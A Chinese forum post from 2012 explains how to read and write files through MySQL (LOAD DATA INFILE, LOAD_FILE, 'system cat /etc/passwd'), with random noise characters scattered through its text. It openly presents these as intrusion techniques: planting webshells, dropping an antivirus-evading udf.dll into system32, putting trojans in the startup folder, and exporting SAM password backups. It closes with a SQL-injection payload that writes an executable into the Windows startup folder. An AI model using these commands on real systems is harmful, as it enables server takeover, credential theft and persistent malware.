找回密码
 立即注册
查看: 2529|回复: 0
打印 上一主题 下一主题

mysql下读取文件的几种方式

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:34:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。
/ {; [  ~  d! ]' r1 h* x8 k思路都一样,在拥有file权限的前提下,读取文件为字符串形式插入表中,然后读出表中数据,只是方式略有不同 * j/ S7 g' S3 M1 a- O/ r
* y. T- Y: B  E6 T4 |; q$ x
mysql3.x下 ; R/ O+ |7 E* C' S0 x0 v. V$ b) R
- b8 f* o! d+ X9 L5 ^
不确定mysql3.x下能否使用load_file()函数(我在mysql3使用手册上没有查到,但貌似是可以的),用 load data infile 读取文件,命令如下 3 @/ y2 Z- u; p! W/ s1 U, \* W0 @
- l* E- n, {- D" I2 g/ S1 @" i, L/ v
mysql>create table a (cmd text);
  s, b1 q2 J7 i# amysql>load data infile 'c:\\boot.ini' into table a;
# j5 d, W% A' g* o. g- d2 f3 _$ _9 imysql>select * from a;
2 {1 b( ^' o1 R4 J+ l- w# B3 `8 \) p4 E+ U" ~( Y. k4 q
mysql4.x下 ) z1 r. a/ i: X9 i  \
% k* X6 p, V9 t8 X
mysql4.x下除了 load data infile 外还可以用大家熟知的 load_file() 来读取,命令如下
) _! G/ ?+ n4 j& L$ U3 J) C6 Y' r2 s& l  a7 o6 W! I& x1 f
mysql>create table a (cmd text);
5 O5 i/ N: ^5 w: cmysql>insert into a (cmd) values (load_file('c:\\boot.ini'));   U4 e7 T% Y& N2 o5 a
mysql>select * from a; ! s2 `+ N6 L9 o" T6 B! J

( t$ z8 ]3 z+ H3 ], y, vmysql5.x下 , [# S9 N- p, Z! t" L. ^* Q! X
$ i3 c8 N0 ?) w! }9 V. N0 r0 f6 |2 @5 p
在linux下,mysql5.x 除了上面两种方法,还可以利用 system 直接执行系统命令的方式来读取文件(是否必须root身份不确定,未测试),命令如下 ( h. {+ W& X5 |! U- R2 `" B% h

) `. Y- p7 O6 }  Omysql>system cat /etc/passwd + E, n! u% I3 I  R4 a* h8 K. q
8 |3 j: t7 `7 l* r; y$ i
8 O( g0 x0 T% A7 r* A( r* C- D6 f
mysql下读取文件在入侵中用到的时候不多,可能用于查询配置文件寻找web路径,或者webshell权限很小的时候读取其他格式的webshell内容然后用into outfile方式写入大马等,二进制文件也可以这样用,只是多了hex()和unhex()的工序。 3 X  c& u$ s; x8 }* m" L6 c- R8 \1 s
' d, i4 i8 o' L% ?. N: r8 ~( v( p
: x' h, d% g5 ]) J
例:把免杀过的udf.dll文件插入系统目录 # r( u1 e3 e" B. K. S; N+ u/ g5 u0 C9 i7 e

5 [3 t# x1 O. U) _/ dcreate table a (cmd LONGBLOB);
. K/ h4 I3 x) y) I6 Hinsert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll')));
/ q+ V6 p- i" S, RSELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll'; / }/ a" t" |7 C+ T
! g* I- \% U: V
其他的利用方法也很多,如把木马文件写入启动项,或者把加工过的cmd.exe文件导出到系统根目录下,把sam备份导出到可读目录等等,注入中应该也可以这样用(在不知道web路径又可以导出文件的情况下),大家自由发挥吧。 7 j' B/ i4 q3 P. t  y8 m

# V% X& V0 g. l4 Q/ N3 `2 M, W# Z
: m2 F1 J* R2 T  g% `1 M; o注入中的语法(未测试) 4 l* u( m5 R* Q* c  ~

( K+ S1 \7 H, v5 [$ `3 N5 P3 T+ j
id=xxx and 1=2 union select 1,2,3,unhex(mm.exe的十六进制),5 INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\「开始」菜单\程序\启动\\mm.exe'/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表